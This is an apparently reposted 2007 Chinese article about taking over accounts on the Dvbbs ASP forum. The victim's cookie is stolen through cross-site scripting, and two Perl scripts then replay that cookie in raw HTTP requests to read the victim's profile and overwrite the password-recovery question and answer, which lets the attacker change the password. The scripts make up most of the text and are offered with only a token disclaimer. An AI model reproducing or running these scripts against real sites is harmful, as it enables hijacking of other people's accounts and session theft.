突破动网先锋asp论坛的密码加密限制-网络通信专区

突破动网先锋asp论坛的密码加密限制

作者：协议分析网编辑：王炯 2007-07-03 00:00

对动网先锋asp论坛的安全性分析----跨站脚本攻击动网论坛密码和提示问题答案是md5加密过的，拿到cookie也没什么价值，我们可以换一种思路，拿到cookie后，通过发送一个请求取的用户的相关资料，然后再发送个请求修改用户提示问题以及答案。

声明:
以下的两个脚本尽供参考，请勿用作非法用途,否则一切后果自负!
hiallone是我在动网论坛注册的用来测试的用户，大家可以看看演示效果

http://enter.3322.net/cgi-bin/dongw.cgi
http://enter.3322.net/cgi-bin/dongw1.cgi

#!/usr/bin/perl
#取得用户资料
# http://enter.3322.net/cgi-bin/dongw.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
$str = "";
$len =length($str);
$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept: */*\r\n".
"Cookie: aspsky=password=965eb72c92a549dd&usercookies=
0&username=hiallone&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&upNum=1;\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: $len\n\n".
"$str\n\n";
@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(''tcp'')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can''t connect...\n");
}
}

------------------------------------------------

#!/usr/bin/perl
#修改提示问题以及答案，在这里我们可以修改quesion=whoami21&answer=superdao
#那么你可以去改他的密码了,呵呵!
#http://enter.3322.net/cgi-bin/dongw1.cgi
use Socket;
$host = "bbs.aspsky.net";
$port = 80;
$str = ''Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=
superdao&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=
&birthmonth=&birthday=&face=Pic%2FImage1.gif&myface=
Pic%2FImage1.gif&width=22&height=22&URL=&groupname=
%CE%DE%C3%C5%CE%DE%C5%C9&OICQ=&ICQ=&msn=&showRe=
1&Signature=&usercookies=0&Submit=%B8%FC+%D0%C2'';
$len =length($str);

$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n".
"Host: $host\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n".
"Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=
%C2%DB%CC%B3%D3%CE%C3%F1&username=hiallone&usercookies=0\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\n\n".
"$str\n\n";

@re =sendraw($req);
print "Content-type: text/html\n\n";
print "@re";
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname(''tcp'')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$| = 1;
print $req;
my @res = <S>;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can''t connect...\n");
}
}

文章转载地址：http://www.cnpaf.net/Class/hack/05121820345286175904.htm

关注我们